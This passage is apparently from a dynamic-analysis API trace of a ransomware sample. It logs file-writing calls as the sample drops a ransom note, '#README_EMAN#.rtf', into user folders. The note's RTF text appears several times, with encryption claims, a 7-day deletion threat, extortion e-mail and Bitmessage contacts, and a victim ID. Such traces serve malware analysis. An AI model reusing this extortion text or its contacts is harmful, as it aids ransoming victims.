r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.701] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.701] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.702] CloseHandle (hObject=0x27c) returned 1 [0301.702] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\#readme_eman#.rtf")) returned 0xffffffff [0301.702] GetLastError () returned 0x2 [0301.702] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.703] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, 